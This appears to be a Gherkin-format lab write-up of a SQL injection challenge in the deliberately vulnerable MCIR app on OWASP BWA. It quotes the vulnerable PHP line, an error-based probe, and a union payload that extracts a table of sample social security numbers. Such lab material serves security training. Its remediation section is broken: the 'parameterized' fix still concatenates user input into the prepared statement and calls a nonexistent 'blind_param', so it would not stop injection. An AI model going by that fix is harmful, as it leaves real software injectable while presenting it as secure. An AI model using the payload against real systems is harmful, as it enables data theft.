## Version 1.4.1
## language: en

Feature:
  TOE:
    MCIR
  Category:
    sql injection
  Location:
    http://192.168.1.124/MCIR/sqlol/challenges/challenge1.php - user(field)
  CWE:
    CWE-0089: Improper Neutralization of Special Elements used in an SQL Command
    ('SQL Injection') -base-
      https://cwe.mitre.org/data/definitions/89.html
    CWE-0943: Improper Neutralization of Special Elements in Data
    Query Logic -class-
      https://cwe.mitre.org/data/definitions/943.html
    CWE-1019: Validate Inputs -category-
      https://cwe.mitre.org/data/definitions/1019.html
  CAPEC:
    CAPEC-066: SQL Injection -standard-
      http://capec.mitre.org/data/definitions/66.html
    CAPEC-248: Command Injection -meta-
      http://capec.mitre.org/data/definitions/248.html
  Rule:
    REQ.191: Protect data with maximum level
  Goal:
    Find the table of social security numbers and extract its information
  Recommendation:
    Validate and sanitise user input and use parameterized queries

  Background:
  Hacker's software:
    | <Software name> | <Version>      |
    | Ubuntu          | 18.04.1        |
    | Chrome          | 71.0.3578.98-1 |
  TOE information:
    Given I am running owasp bwa in VM virtualBox
    And I access to the next url
    """
    http://MCIR/
    """
    And I can see all the vulnerabilities of the app

  Scenario: Normal use case
  Show
    Given I access to the section sqlol
    """
    http://MCIR/sqlol/select.php
    """
    And I can see the injection parameters configuration
    And I got to the following link
    """
    http://MCIR/sqlol/challenges/challenge1.php
    """
    And I see the following text
    """
    Your objective is to find the table of social
    security numbers present in the database and extract its information.
    """

  Scenario: Static detection
  Doesn't validate characters and doesn't use parameterized queries
    When I look at the code in the following link
    """
    https://github.com/SpiderLabs/MCIR/blob/master/sqlol/select.php
    """
    Then I can see following lines of code
    """
    75 $where_clause = 'WHERE isadmin = ' . $_REQUEST['inject_string'];
    """
    Then I can conclude that the characters entered by user doesn't sanitise
    And I see the following lines
    """
    24 $db_conn->SetFetchMode(ADODB_FETCH_ASSOC);
    25 $results = $db_conn->Execute($query);
    """
    And I can see that doesn't use parameterized queries
    Then I conclude that the application is vulnerable  to injection sql


  Scenario: Dynamic detection
  Show a fail message in the application
    Given I can to insert parameters in the text field
    Then I wrote a quote in the text field
    Then I get the output:
    """
    You have an error in your SQL syntax; check the manual that
    corresponds to your MySQL server version for the right
    syntax to use near ''' at line 1
    """
    Then I can conclude that the data is not validate

  Scenario: exploitation
  Get information of the table of social security numbers
    Given I need to know the table name of social security numbers
    Then I put in the text field the following query:
    """
    SELECT * FROM INFORMATION_SCHEMA.TABLES
    WHERE TABLE_TYPE = 'BASE TABLE'
    """
    Then I get the output:
    """
    sqlol [TABLE_NAME] => ssn
    """
    Then I use the name of the table to generate the injection
    """
    1 union select ssn from ssn #
    """
    And i get the following output
    """
    Array ( [username] => Herp Derper )
    Array ( [username] => SlapdeBack LovedeFace )
    Array ( [username] => 000-00-1112 )
    Array ( [username] => 012-34-5678 )
    Array ( [username] => 111-22-3333 )
    Array ( [username] => 666-67-6776 )
    Array ( [username] => 999-99-9999 )
    """
    And I can see the social security numbers

  Scenario: Remediation
  Using parameterized queries
    Given I am running MCIR in OWASP BWA
    And I detect that application doesn't use parameterized queries
    Then The vulnerabilitie can be patched using PDO
    """
    75 $where_clause = $pdo->prepare('WHERE isadmin = '
    . $_REQUEST['inject_string']);
    """
    And I can use the same tecnique in the following lines
    """
    25 $results->blind_param('q',$query);
    26 $db_conn->execute($query);
    """
    Then Using this methods we can be prevent a sql injection

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    8.9/10 (High) - AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:H/A:H/
  Temporal: Attributes that measure the exploit's popularity and fixability
    7.9/10 (High) - E:F/RL:O/RC:R/
  Environmental: Unique and relevant attributes to a specific user environment
    8.0/10 (High) - CR:H/IR:H/AR:H

  Scenario: Correlations
    No correlations have been found to this date 2019-01-29